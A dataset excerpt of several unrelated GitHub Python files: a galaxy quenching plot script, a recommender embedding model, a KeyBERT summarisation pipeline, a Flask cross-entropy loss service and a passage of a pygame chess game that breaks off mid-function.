'elektra.cosmo25cmb.4096g5HbwK1BH'\n\n tfile_s = prefix + 'storm.cosmo25cmb/storm.cosmo25cmb.4096g5HbwK1BH/storm.cosmo25cmb.4096g5HbwK1BH.004096/storm.cosmo25cmb.4096g5HbwK1BH.004096'\n tfile_base_s = 'storm.cosmo25cmb.4096g5HbwK1BH'\n \n tfile_base_1 = 'h148.cosmo50PLK.3072g3HbwK1BH'\n tfile_1 = prefix + 'h148.cosmo50PLK.3072g/h148.cosmo50PLK.3072g3HbwK1BH/snapshots_200bkgdens/h148.cosmo50PLK.3072g3HbwK1BH.004096' #\n tfile_1 = prefix + 'h148.cosmo50PLK.3072g/h148.cosmo50PLK.3072g3HbwK1BH/h148.cosmo50PLK.3072g3HbwK1BH.004096/h148.cosmo50PLK.3072g3HbwK1BH.004096'\n \n tfile_base_1hr = 'h148.cosmo50PLK.6144g3HbwK1BH/'\n tfile_1hr = prefix + 'h148.cosmo50PLK.6144g/h148.cosmo50PLK.6144g3HbwK1BH/h148.cosmo50PLK.6144g3HbwK1BH.004096/ahf_200/h148.cosmo50PLK.6144g3HbwK1BH.004096'\n \n tfile_base_2 = 'h229.cosmo50PLK.3072gst5HbwK1BH'\n tfile_2 = prefix + 'h229.cosmo50PLK.3072g/h229.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h229.cosmo50PLK.3072gst5HbwK1BH.004096' #\n tfile_2 = prefix + 'h229.cosmo50PLK.3072g/h229.cosmo50PLK.3072gst5HbwK1BH/h229.cosmo50PLK.3072gst5HbwK1BH.004096/h229.cosmo50PLK.3072gst5HbwK1BH.004096' \n \n tfile_base_3 = 'h242.cosmo50PLK.3072gst5HbwK1BH'\n tfile_3 = prefix + 'h242.cosmo50PLK.3072g/h242.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h242.cosmo50PLK.3072gst5HbwK1BH.004096' #\n tfile_3 = prefix + 'h242.cosmo50PLK.3072g/h242.cosmo50PLK.3072gst5HbwK1BH/h242.cosmo50PLK.3072gst5HbwK1BH.004096/h242.cosmo50PLK.3072gst5HbwK1BH.004096'\n\n tfile_base_4 = 'h329.cosmo50PLK.3072gst5HbwK1BH'\n tfile_4 = prefix + 'h329.cosmo50PLK.3072g/h329.cosmo50PLK.3072gst5HbwK1BH/snapshots_200bkgdens/h329.cosmo50PLK.3072gst5HbwK1BH.004096' #\n tfile_4 = prefix + 'h329.cosmo50PLK.3072g/h329.cosmo50PLK.3072gst5HbwK1BH/h329.cosmo50PLK.3072gst5HbwK1BH.004096/h329.cosmo50PLK.3072gst5HbwK1BH.004096'\n \n tfile_base_4hr = 'h329.cosmo50PLK.6144g5HbwK1BH'\n tfile_4hr = prefix + 'h329.cosmo50PLK.6144g/h329.cosmo50PLK.6144g5HbwK1BH/h329.cosmo50PLK.6144g5HbwK1BH.004096/ahf_200/h329.cosmo50PLK.6144g5HbwK1BH.004096' # \n \n tfiles = [tfile_cm, tfile_e, tfile_r, tfile_s, tfile_1, tfile_1hr, tfile_2, tfile_3, tfile_4, tfile_4hr]\n tfile_base = [tfile_base_cm, tfile_base_e, tfile_base_r, tfile_base_s, tfile_base_1, tfile_base_1hr, tfile_base_2, tfile_base_3, tfile_base_4, tfile_base_4hr]\n\n objs_pd = None \n for tfile, base in zip(tfiles, tfile_base):\n objs_dat = []\n print(tfile)\n '''\n f=open(tfile + '.MAP.data', 'rb')\n while 1:\n try:\n objs_dat.append(pickle.load(f))\n except EOFError:\n break \n f.close()\n '''\n objs_dat = pd.read_csv(tfile + '.MAP.data.csv')\n if len(objs_dat) == 1:\n temp = pd.DataFrame(objs_dat[0])\n else:\n temp = pd.DataFrame(objs_dat)\n simname = base.split('.')[0]\n if (base.split('.')[2])[0] == '6':\n simname = simname+'_6144'\n temp['M_star'] = temp['mstar']\n temp['mass'] = temp['mvir']\n \n temp['sim'] = [simname]*len(temp)\n if not 'massiveDist' in temp:\n temp = distance_to_nearest_host(temp,[tfile])\n #temp.to_pickle(tfile + '.MAP.data')\n temp.to_csv(tfile + '.MAP.data.csv')\n\n temp.to_csv(tfile + '.MAP.data.csv', index=False)\n\n if objs_pd is None: \n objs_pd = temp\n else:\n objs_pd = objs_pd.append(temp, ignore_index = True) \n\n #Match halos between my and Ferah's data \n fdmdata_mod = fdmdata.copy()\n objs_pd = match_halos(objs_pd, fdmdata_mod)\n #remove entries (rows) from objs_pd that have no match in Ferah's data\n index_rm = objs_pd[(objs_pd['m200_haloid']).isnull()].index\n objs_pd = objs_pd.drop(index_rm)\n \n ind = 0\n tau90 = np.empty(len(objs_pd)) \n for index, row in objs_pd.iterrows():\n row['sfh'] = row['sfh'].replace(' ',' ')\n row['sfh'] = row['sfh'].replace(' ',' ')\n row['sfh'] = row['sfh'].replace(' ',' ')\n row['sfh'] = row['sfh'].replace(' ',' ') \n sfh_str = ((row['sfh'])[2:-1].replace('\\n','')).split(' ')\n sfh = []\n for x in sfh_str:\n if x != '':\n sfh.append(float(x))\n sfh = np.array(sfh)\n #sfh = np.array([float(x) for x in sfh_str])\n row['sfhbins'] = row['sfhbins'].replace(' ',' ')\n row['sfhbins'] = row['sfhbins'].replace(' ',' ')\n row['sfhbins'] = row['sfhbins'].replace(' ',' ')\n row['sfhbins'] = row['sfhbins'].replace(' ',' ')\n sfhbins_str = ((row['sfhbins'])[2:-1].replace('\\n','')).split(' ')\n sfhbins = []\n for x in sfhbins_str:\n if x != '':\n sfhbins.append(float(x))\n sfhbins = np.array(sfhbins)\n #sfhbins = np.array([float(x) for x in sfhbins_str])\n #sfh = row['sfh']\n #sfhbins = row['sfhbins']\n \n if len(sfhbins) != len(sfh):\n xarr = sfhbins[1:] - (sfhbins[1] - sfhbins[0])\n else:\n xarr = sfhbins[:]\n yarr = np.cumsum(sfh)/max(np.cumsum(sfh))\n if (yarr[0] >= 0.9):\n tau90[ind] = xarr[0]\n else:\n interp = interp1d(yarr, xarr) #, kind='cubic')\n if np.isnan(interp(0.9)):\n tau90[ind] = 0\n else:\n tau90[ind] = float(interp(0.9))\n ind = ind + 1 \n\n objs_pd['tau90'] = tau90\n \n halo_label = {'halo_label': \"\"}\n objs_pd = objs_pd.join(pd.DataFrame(columns=halo_label))\n objs_pd.loc[~objs_pd['m200_haloid'].isnull(),'halo_label'] = objs_pd[~objs_pd['m200_haloid'].isnull()]['sim']+objs_pd[~objs_pd['m200_haloid'].isnull()]['m200_haloid'].astype(str)\n objs_pd = objs_pd.set_index('halo_label')\n\n fdmdata = fdmdata.join(pd.DataFrame(columns=halo_label))\n fdmdata['halo_label'] = fdmdata['simname']+fdmdata['halogrp_z0'].astype(str)\n fdmdata = fdmdata.set_index('halo_label') \n\n objs_pd_comb = pd.concat([objs_pd,fdmdata], join=\"inner\", axis=1)\n\n '''\n plt.clf()\n plt.figure(1)\n ind = 0\n for index, row in objs_pd.iterrows():\n if (type(row['sfhbins']) == float):\n tau90[ind] = 0\n else:\n if len(row['sfhbins']) != len(row['sfh']):\n xarr = row['sfhbins'][1:] - (row['sfhbins'][1] - row['sfhbins'][0])\n else:\n xarr = row['sfhbins'][:]\n yarr = np.cumsum(row['sfh'])/max(np.cumsum(row['sfh']))\n plt.clf()\n plt.plot(xarr,yarr)\n plt.plot([0,14],[0.9,0.9])\n if (yarr[0] >= 0.9):\n tau90[ind] = xarr[0]\n else:\n interp = interp1d(yarr, xarr) #, kind='cubic')\n print(ind,interp(0.9))\n tau90[ind] = float(interp(0.9))\n ind = ind + 1\n '''\n\n\n #scalarMap = cm.ScalarMappable(norm=cNorm, cmap=cmx)\n plt.clf()\n fig1 = plt.figure(1,figsize = (plt_width,plt_width*aspect_ratio*1.2))\n fig1.set_size_inches(plt_width,plt_width*aspect_ratio*1.2)\n fig1.clear()\n #gs = fig2.add_gridspec(1)\n #axs = gs.subplots() #, constrained_layout=True)\n #axs = axs.flatten()\n #ax1 = axs[0]\n #fig1.subplots(constrained_layout)\n gs = gridspec.GridSpec(ncols = 1,nrows = 2, figure=fig1, height_ratios=[1,15])\n ax1 = fig1.add_subplot(gs[1])\n ax1sub = fig1.add_subplot(gs[0])\n\n cmx = plt.get_cmap(\"cool_r\") \n cNorm = colors.Normalize(vmin=0, vmax = 14) \n q = ax1.scatter(objs_pd[objs_pd['SFR'] < 1e-11]['massiveDist'],objs_pd['M_star'][objs_pd['SFR'] < 1e-11],s = (objs_pd['Rvir'][objs_pd['SFR'] < 1e-11]*2*ms_scale).tolist(), c = tau90[objs_pd['SFR'] < 1e-11], cmap = cmx, norm = cNorm,edgecolor = 'k',marker = 'D', linewidths = edgewidth)\n sf = ax1.scatter(objs_pd[objs_pd['SFR'] >= 1e-11]['massiveDist'],objs_pd['M_star'][objs_pd['SFR'] >= 1e-11],s = (objs_pd['Rvir'][objs_pd['SFR'] >= 1e-11]*2*ms_scale).tolist(), c = tau90[objs_pd['SFR'] >= 1e-11], cmap = cmx, norm = cNorm,edgecolor = 'k', linewidths = edgewidth)\n #plt.scatter(objs_pd_e['h1dist'],objs_pd_e['M_star'])\n lgnd = ax1.legend([q,sf],['Quenched','Star forming'],scatterpoints = 1,facecolor = 'white',loc = 3,framealpha = 0,frameon = False)\n lgnd.legendHandles[0]._sizes = [markersize]\n lgnd.legendHandles[1]._sizes = [markersize]\n ax1.set_xscale('log')\n ax1.set_yscale('log')\n ax1.axis([17, 7e3, 1e2, 1e10])\n ax1.set_ylabel(r'M$_*$/M$_\\odot$')\n ax1.set_xlabel(r'Distance to massive galaxy (kpc)')\n sm = plt.cm.ScalarMappable(cmap=cmx, norm=cNorm)\n #ax1sub = fig1.add_subplot([0.15,0.87,0.35,0.03])\n #cb = plt.colorbar(sm, ax=ax1sub, orientation='horizontal',aspect = 20) \n cb = mpl.colorbar.ColorbarBase(ax1sub, cmap=cmx, norm=cNorm, orientation='horizontal')\n cb.set_label(r\"$\\tau_{90}$ (Gyr)\")\n #fig1.subplots_adjust(hspace = 0.3)\n fig1.tight_layout()\n fig1.subplots_adjust(hspace = 0.4)\n fig1.show()\n fig1.savefig(outbase + '_distance_smass_t90.png',dpi = dpi) \n\n'''\n fig1= plt.figure() \n ax1 = fig1.add_subplot(1,1,1)\n ax1.plot(objs_pd_comb['distances'],objs_pd_comb['Mhalo_z0']/objs_pd_comb['Mpeak'],'x')\n ax1.plot(objs_pd_comb['Mhalo_z0'],objs_pd_comb['Mstar_z0'],'o')\n ax1.plot(objs_pd_comb['Mpeak'],objs_pd_comb['Mstar_z0'],'o')\n ax1.set_yscale('log')\n ax1.set_xscale('log')\n'''\n \n","repo_name":"CharlotteRuth/python_analysis","sub_path":"quench_v_distance.py","file_name":"quench_v_distance.py","file_ext":"py","file_size_in_byte":18705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26213427434","text":"import numpy as np\n\nfrom hw2.datasets.train import TrainDataset\nfrom hw2.embeddings_builder import EmbeddingsBuilder\nfrom hw2.models.base import Model\n\n\nclass EmbeddingModel(Model):\n def __init__(self, embedding_dim: int, random_state: int, verbose: bool = True):\n super().__init__(random_state, verbose)\n self._embeddings = EmbeddingsBuilder(embedding_dim, random_state)\n\n def fit(self, dataset: TrainDataset) -> \"EmbeddingModel\":\n self._embeddings.fit(dataset)\n return self\n\n def predict(self, dataset: TrainDataset) -> np.ndarray:\n scores = np.zeros(len(dataset))\n\n users = dataset.pandas_df[\"msno\"].to_numpy()\n items = dataset.pandas_df[\"song_id\"].to_numpy()\n\n mask = np.array([self._embeddings.has_user(user) and self._embeddings.has_item(item)\n for user, item in zip(users, items)])\n\n user_embs = self._embeddings.get_user_embeddings(users[mask])\n item_embs = self._embeddings.get_item_embeddings(items[mask])\n scores[mask] = np.sum(user_embs * item_embs, axis=1)\n\n return scores\n\n # def _get_user_emb(self, user: str) -> np.ndarray:\n # if not self._embeddings.has_user(user):\n # return self._embeddings.default_embedding\n #\n # return self._embeddings.get_user_embeddings([user])[0]\n #\n # def _get_item_emb(self, item: str) -> np.ndarray:\n # if not self._embeddings.has_item(item):\n # return self._embeddings.default_embedding\n #\n # return self._embeddings.get_item_embeddings([item])[0]\n","repo_name":"Sushentsev/recommendation-systems","sub_path":"hw2/models/embeddings_model.py","file_name":"embeddings_model.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71145356027","text":"#!/usr/bin/env python3\n\nimport logging\nimport sys\n\nimport pandas as pd\nimport regex as re\nimport unidecode\nfrom keybert import KeyBERT\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom summarizer import Summarizer\nfrom tqdm import tqdm\n\ntqdm.pandas()\n\nTEST_FILE = './02-summarize-test.txt'\nSRC_FILE = './data/campaigns.parquet.gzip'\nTGT_FILE = './data/campaigns_summaries.parquet.gzip'\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nfh = logging.StreamHandler()\nfh_formatter = logging.Formatter(fmt='%(asctime)s %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S%p')\nfh.setFormatter(fh_formatter)\nlogger.addHandler(fh)\n\n# Raise level for other loggers\nfor log_name, log_obj in logging.Logger.manager.loggerDict.items():\n if log_name != __name__:\n logging.getLogger(log_name).setLevel(logging.ERROR)\n\n\ndef get_summary(df):\n def summarize(body):\n model = Summarizer()\n result = model(body, num_sentences=3)\n return result\n\n logger.info('Getting summaries...')\n df['summary'] = df.progress_apply(lambda x: summarize(x['details']), axis=1)\n return df\n\n\ndef get_preprocessed_text(df):\n def preprocess(body):\n # Get rid of accents\n unaccented = unidecode.unidecode(body)\n\n # Get rid of punctuation & numbers\n letters_only = re.sub(\"[^a-zA-Z]\", \" \", unaccented)\n\n # Get all lowercase words\n words = letters_only.lower().split()\n\n # Remove stop words\n stops = set(stopwords.words('english'))\n meaningful_words = [w for w in words if w not in stops]\n\n # Instantiate and run Lemmatizer\n lemmatizer = WordNetLemmatizer()\n tokens_lem = [lemmatizer.lemmatize(i) for i in meaningful_words]\n\n # Join back into string\n result = \" \".join(tokens_lem)\n\n # Join into string and return the result.\n return result\n\n logger.info('Getting preprocessed text...')\n df['details_clean'] = df.progress_apply(lambda x: preprocess(x['details']), axis=1)\n df['summary_clean'] = df.progress_apply(lambda x: preprocess(x['summary']), axis=1)\n return df\n\n\ndef get_ngram1(df):\n def ngram1(body):\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, top_n=5)\n return keywords\n\n logger.info('Getting ngram1...')\n df['ngram1_details'] = df.progress_apply(lambda x: ngram1(x['details_clean']), axis=1)\n df['ngram1_summary'] = df.progress_apply(lambda x: ngram1(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram2(df):\n def ngram2(body):\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(1, 2), stop_words='english', top_n=5)\n return keywords\n\n logger.info('Getting ngram2...')\n df['ngram2_details'] = df.progress_apply(lambda x: ngram2(x['details_clean']), axis=1)\n df['ngram2_summary'] = df.progress_apply(lambda x: ngram2(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram_maxsum(df):\n def ngram_maxsum(body):\n \"\"\"Max Sum Similarity\n To diversify the results, we take the 2 x top_n most similar words/phrases to the document.\n Then, we take all top_n combinations from the 2 x top_n words and extract the combination\n that are the least similar to each other by cosine similarity.\n \"\"\"\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(3, 3), stop_words='english', use_maxsum=True,\n nr_candidates=20, top_n=5)\n return keywords\n\n logger.info('Getting ngram maxsum...')\n df['maxsum_details'] = df.progress_apply(lambda x: ngram_maxsum(x['details_clean']), axis=1)\n df['maxsum_summary'] = df.progress_apply(lambda x: ngram_maxsum(x['summary_clean']), axis=1)\n return df\n\n\ndef get_ngram_maxmarginal(df):\n def ngram_maxmarginal(body):\n \"\"\"Maximal Marginal Relevance\n To diversify the results, create keywords based on cosine similarity.\n \"\"\"\n model = KeyBERT('distilbert-base-nli-mean-tokens')\n keywords = model.extract_keywords(body, keyphrase_ngram_range=(3, 3), stop_words='english', use_mmr=True,\n diversity=0.7, top_n=5)\n return keywords\n\n logger.info('Getting ngram maxmarginal...')\n df['maxmarginal_details'] = df.progress_apply(lambda x: ngram_maxmarginal(x['details_clean']), axis=1)\n df['maxmarginal_summary'] = df.progress_apply(lambda x: ngram_maxmarginal(x['summary_clean']), axis=1)\n return df\n\n\nif __name__ == '__main__':\n sys.stdout = open(TEST_FILE, 'w')\n\n logger.info('Starting test.')\n campaigns = pd.read_parquet(SRC_FILE)\n campaigns = campaigns.head(2)\n campaigns = get_summary(campaigns)\n campaigns = get_preprocessed_text(campaigns)\n campaigns = get_ngram1(campaigns)\n campaigns = get_ngram2(campaigns)\n campaigns = get_ngram_maxsum(campaigns)\n campaigns = get_ngram_maxmarginal(campaigns)\n\n for campaign in range(len(campaigns)):\n for col in campaigns.columns:\n print(f'{col.upper()}\\n{campaigns.loc[campaign, col]}\\n')\n print('-------------')\n\n logger.info('Done with test.')\n\n logger.info('STARTING ON FULL DATASET')\n campaigns = pd.read_parquet(SRC_FILE)\n campaigns = get_summary(campaigns)\n campaigns = get_preprocessed_text(campaigns)\n campaigns = get_ngram2(campaigns)\n\n logging.info('Getting separate phrases & values columns...')\n campaigns['details_phrases'] = campaigns.progress_apply(lambda x: [x[0] for x in x['ngram2_details']], axis=1)\n campaigns['details_values'] = campaigns.progress_apply(lambda x: [x[1] for x in x['ngram2_details']], axis=1)\n campaigns['summary_phrases'] = campaigns.progress_apply(lambda x: [x[0] for x in x['ngram2_summary']], axis=1)\n campaigns['summary_values'] = campaigns.progress_apply(lambda x: [x[1] for x in x['ngram2_summary']], axis=1)\n\n # Save file with url, summary, and keywords only\n logging.info(f'Saving {TGT_FILE}')\n cols = ['url', 'summary', 'details_phrases', 'details_values', 'summary_phrases', 'summary_values']\n campaigns[cols].to_parquet(TGT_FILE, compression='gzip')\n\n logger.info('Done.')\n","repo_name":"dawngraham/cs688-gnad","sub_path":"02-summarize.py","file_name":"02-summarize.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23397745189","text":"import numpy as np\nimport blosc\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route(\"/forward\", methods=[\"POST\"])\ndef forward():\n logits = blosc.unpack_array(bytes.fromhex(request.form[\"logits\"]))\n targets = blosc.unpack_array(bytes.fromhex(request.form[\"targets\"]))\n\n targets = targets.reshape(-1)\n m = targets.shape[0]\n\n loss = np.sum(-np.log(logits[range(m), targets])) / m\n loss = loss.reshape(-1,1)\n loss = blosc.pack_array(loss)\n res = {\"loss\": loss.hex()}\n return jsonify(res)\n\n@app.route(\"/backward\", methods=[\"POST\"])\ndef backward():\n logits = blosc.unpack_array(bytes.fromhex(request.form[\"logits\"]))\n targets = blosc.unpack_array(bytes.fromhex(request.form[\"targets\"]))\n\n grad = request.form[\"grad\"]\n grad = blosc.unpack_array(bytes.fromhex(grad))\n\n targets = targets.reshape(-1)\n m = targets.shape[0]\n\n logits[range(m), targets] -= 1\n out = grad * logits / m\n out = blosc.pack_array(out)\n res = {\"out\": out.hex()}\n return jsonify(res)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=30006)","repo_name":"iVishalr/dockerNN","sub_path":"dockernn/nn/cross_entropy_loss/cross_entropy_loss.py","file_name":"cross_entropy_loss.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"1102524849","text":"\"\"\"\nHandles rendering and game logic\n\"\"\"\nimport pygame\nfrom json import load\nfrom board import Board\nfrom pathlib import Path\nfrom button import TextButton\nfrom button import ImageButton\nimport texture\nimport sys\nimport time\nimport button\nimport player\nimport piece\nimport engine\n\nclass SceneManager():\n \"\"\"\n Handles rendering and game logic\n \"\"\"\n def __init__(self):\n pygame.init()\n # Open config file, and assign read json to config\n config_f = open(Path(\"config.json\"))\n self.config = load(config_f)\n config_f.close()\n\n # Create window, and scale it to be fullscreen\n win = pygame.display.set_mode((0,0))\n self.screen_resolution = [win.get_width(), win.get_height()]\n self.win_size = self.screen_resolution\n self.win = pygame.display.set_mode(self.win_size)\n\n # Set window caption, as indicated in config\n pygame.display.set_caption(self.config[\"title_text\"])\n\n # Load in texture pack indicated in config, and load in starting position\n self.board = Board(\"assets/images/board_and_pieces/\"+ self.config[\"texture_pack\"], [48, 48])\n self.board.loadfen(self.config[\"starting_position\"])\n\n # \"Game states\", indicate which function should be called at start of every frame\n self.MAINGAME_STATE = 1\n self.state = self.MAINGAME_STATE\n self.state_to_function = {self.MAINGAME_STATE: self.maingame}\n\n # Unscaled size the actual surface of game\n self.surface_size = [950, 540]\n self.surface = pygame.Surface(self.surface_size)\n\n # Offset applied from (0,0)\n self.board_offset = [round((self.surface_size[0] - self.board.square_size[0] * 8) / 2), round((self.surface_size[1] - self.board.square_size[0] * 8) / 2)]\n self.board_bottomright = [self.board_offset[0]+ self.board.surface.get_width(), self.board_offset[1]+ self.board.surface.get_height()]\n\n\n # Colors used in ui\n self.ui_bg = (10,10,10)\n self.ui_white = (255,255,255)\n self.ui_black = (0,0,0)\n self.ui_secondary = (30,30,30)\n self.ui_text = (255,255,255)\n self.ui_popup = (100, 100, 255)\n \n # Fonts used in ui\n self.title_font = pygame.font.Font(Path(\"assets/fonts/Gamer.TTF\"),50)\n self.buttons_font = pygame.font.Font(Path(\"assets/fonts/Gamer.TTF\"),50)\n\n # Title surface, and its position\n self.title_surface = self.title_font.render(self.config[\"title_text\"], False, self.ui_text)\n self.title_pos = [texture.center_x(self.title_surface, self.surface_size), 20]\n\n # Directory containing sounds\n self.sound_pack = \"assets/sounds/\" + self.config[\"sound_pack\"] +\"/\"\n \n # Sounds\n self.click_sound = self.sound_pack + \"click.wav\"\n\n\n\n # \"main ui\" buttons\n buttons = [\"Play\", \"Settings\", \"Exit\"]\n self.main_ui_buttons = button.ButtonHandler([])\n start = [35, self.board_offset[1]+5]\n height = 50\n width = 200\n gap = 5 + height\n for y in range (0,3):\n self.main_ui_buttons.buttons.append( button.TextButton([width,height], [start[0],start[1] + gap * y],Path(self.sound_pack + \"click.wav\"), buttons[y], self.buttons_font, self.ui_text, self.ui_secondary))\n\n\n # Player list, and portret ui\n self.portrets = \"assets/images/ui/portrets/\"+self.config[\"portrets\"]+\"/\"\n self.portret_size = [75,75]\n self.players = [player.Human(self.portrets + \"human.png\", self.portret_size, \"Human\", self.buttons_font, self.ui_text), player.RandomBot(self.portrets + \"bot.png\", self.portret_size, \"Random\", self.buttons_font, self.ui_text), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo1\", self.buttons_font, self.ui_text, False, 1), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo2\", self.buttons_font, self.ui_text, False, 2), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo3\", self.buttons_font, self.ui_text, False, 3), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"4\", self.buttons_font, self.ui_text, False, 4), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo5\", self.buttons_font, self.ui_text, False, 5), player.BasicBot(self.portrets + \"bot.png\", self.portret_size, \"Dumbo6\", self.buttons_font, self.ui_text, False, 6)]\n self.player_index = 0\n self.active_players = [None, None]\n self.total_players = len(self.players)\n self.portret_underlay_gap = 10\n self.other_ui_rect = pygame.Rect([start[0],start[1]*3+height - 20],[width, height*4])\n self.portret_rect = pygame.Rect([self.other_ui_rect.left +texture.center_x(self.portret_size, self.other_ui_rect.size), self.other_ui_rect.top + round(self.portret_size[1] /4)], self.portret_size)\n self.portret_underlay = self.portret_rect.move([-self.portret_underlay_gap, -self.portret_underlay_gap])\n self.portret_underlay.size = [self.portret_underlay.width + self.portret_underlay_gap*2, self.portret_underlay.height+self.portret_underlay_gap*2]\n self.portret_name_rect = self.portret_rect.move(0, self.portret_size[1]+20)\n self.arrow_buttons = button.ButtonHandler([])\n arrow_buttons_size = [40,40]\n arrow_buttons_gap = 18\n self.arrow_buttons.buttons.append(button.TextButton(arrow_buttons_size, [self.portret_name_rect.left-arrow_buttons_gap-arrow_buttons_size[0], self.portret_name_rect.top] , Path(self.sound_pack + \"click.wav\"), \"<\", self.buttons_font, self.ui_text, self.ui_bg))\n self.arrow_buttons.buttons.append(button.TextButton(arrow_buttons_size, [self.portret_name_rect.right+arrow_buttons_gap, self.portret_name_rect.top] , Path(self.sound_pack + \"click.wav\"), \">\", self.buttons_font, self.ui_text, self.ui_bg))\n confirm_button_size = [150,35]\n confirm_button_gap = 50\n self.confirm_button = button.TextButton(confirm_button_size, [self.other_ui_rect.left +texture.center_x(confirm_button_size, self.other_ui_rect.size), self.portret_name_rect.top + confirm_button_gap], Path(self.sound_pack + \"click.wav\"),\"Confirm\",self.buttons_font, self.ui_black, self.ui_white)\n\n # Ui state\n self.PLAY_STATE = \"PLAY\"\n self.SETTINGS_STATE = \"SETTINGS\"\n self.ui_state = None\n self.select_color = piece.WHITE\n self.ingame = False\n\n # Game stuff\n self.ui_promotion_pos = None\n self.ui_promotion_size = self.board.square_size\n self.ui_promotion_buttons = button.ButtonHandler([])\n\n\n # Delta time\n self.dt = 0\n self.last_time = time.time()\n\n # Is [-1,-1] if player hasn't clicked this frame, else is click position on surface\n self.click_pos = [-1,-1]\n\n # Board underlay\n self.board_underlay_size = [40,40]\n self.board_underlay = pygame.Rect([self.board_offset[0]- round(self.board_underlay_size[0]/2), self.board_offset[1]- round(self.board_underlay_size[1]/2)],[(self.board.square_size[0] * 8) + self.board_underlay_size[0], (self.board.square_size[1] * 8)+self.board_underlay_size[1]])\n\n def update_main_ui(self):\n # Play pressed:\n if self.main_ui_buttons.buttons[0].pressed:\n self.main_ui_buttons.buttons[0].pressed = False\n self.ui_state = self.PLAY_STATE\n # Settings pressed:\n elif self.main_ui_buttons.buttons[1].pressed:\n self.main_ui_buttons.buttons[1].pressed = False\n self.ui_state = self.SETTINGS_STATE\n # Exit\n elif self.main_ui_buttons.buttons[2].pressed:\n self.quit()\n\n def update_arrow_buttons(self):\n self.arrow_buttons.updates(self.click_pos)\n # Left\n if self.arrow_buttons.buttons[0].pressed == True:\n self.arrow_buttons.buttons[0].pressed = False\n self.player_index -= 1\n if self.player_index <= -self.total_players:\n self.player_index = 0\n # Right\n if self.arrow_buttons.buttons[1].pressed == True:\n self.arrow_buttons.buttons[1].pressed = False\n self.player_index += 1\n if self.player_index >= self.total_players:\n self.player_index = 0\n\n def update_confirm_button(self):\n self.confirm_button.update(self.click_pos)\n #\n if self.confirm_button.pressed:\n self.confirm_button.pressed = False\n if self.ui_state == self.PLAY_STATE:\n if self.select_color == piece.WHITE:\n self.confirm_button.change_font_color(self.ui_white)\n self.confirm_button.change_bg_color(self.ui_black)\n self.active_players[0] = self.players[self.player_index]\n\n elif self.select_color == piece.BLACK:\n self.confirm_button.change_font_color(self.ui_black)\n self.confirm_button.change_bg_color(self.ui_white)\n self.active_players[1] = self.players[self.player_index]\n\n self.select_color += 1\n if self.select_color > 1:\n self.select_color = 0\n self.ui_state = None\n self.ingame = True\n\n\n def draw_main_ui(self):\n self.main_ui_buttons.draws(self.surface)\n\n if self.ui_state == self.PLAY_STATE:\n self.update_arrow_buttons()\n self.update_confirm_button()\n\n pygame.draw.rect(self.surface, self.ui_secondary, self.other_ui_rect)\n self.surface.blit(self.players[self.player_index].image, self.portret_rect)\n self.portret_name_rect.x = self.other_ui_rect.left + texture.center_x(self.players[self.player_index].name_surf, self.other_ui_rect.size)\n pygame.draw.rect(self.surface, self.ui_bg, self.portret_underlay)\n self.surface.blit(self.players[self.player_index].image, self.portret_rect)\n self.surface.blit(self.players[self.player_index].name_surf, self.portret_name_rect)\n self.arrow_buttons.draws(self.surface)\n self.confirm_button.draw(self.surface)\n\n\n\n\n\n\n elif self.ui_state == self.SETTINGS_STATE:\n pass\n\n def is_click_on_board(self) -> bool:\n if self.click_pos[0] >= self.board_offset[0] and self.click_pos[1] >= self.board_offset[1]:\n if self.click_pos[0] <= self.board_bottomright[0] and self.click_pos[1] <= self.board_bottomright[1]:\n return True\n return False\n def update_board(self):\n if isinstance(self.active_players[self.board.board_data.active], player.Human):\n # If click is on board\n if self.is_click_on_board():\n # Please forgive me god\n pos = [-1,-1]\n for i in range(0, self.click_pos[0] - self.board_offset[0], self.board.square_size[0]):\n pos[0] += 1\n for j in range(0, self.click_pos[1] - self.board_offset[1], self.board.square_size[1]):\n pos[1] += 1\n\n self.active_players[self.board.board_data.active].touch(self.board.board_data, engine.Coordinate(pos[1], pos[0]))\n else:\n move = self.active_players[self.board.board_data.active].move(self.board.board_data)\n if move != None:\n self.board.board_data.apply_move(move)\n\n\n def maingame(self):\n self.main_ui_buttons.updates(self.click_pos)\n self.update_main_ui()\n if self.ingame:\n self.update_board()\n\n\n # Drawing loop\n self.surface.fill(self.ui_bg)\n pygame.draw.rect(self.surface, self.ui_secondary, self.board_underlay)\n\n selected = None\n self.ui_promotion_buttons.buttons = []\n legal_moves = []\n # \n if isinstance(self.active_players[self.board.board_data.active], player.Human):\n # \n if self.active_players[self.board.board_data.active].selected != None:\n selected = [self.active_players[self.board.board_data.active].selected]\n legal_moves = self.active_players[self.board.board_data.active].legal_moves\n \n # Pop up ui for promotion\n if self.active_players[self.board.board_data.active].promotion != None:\n # Create the buttons\n self.ui_promotion_pos = [700,200]\n for piece in range(0, 4):\n 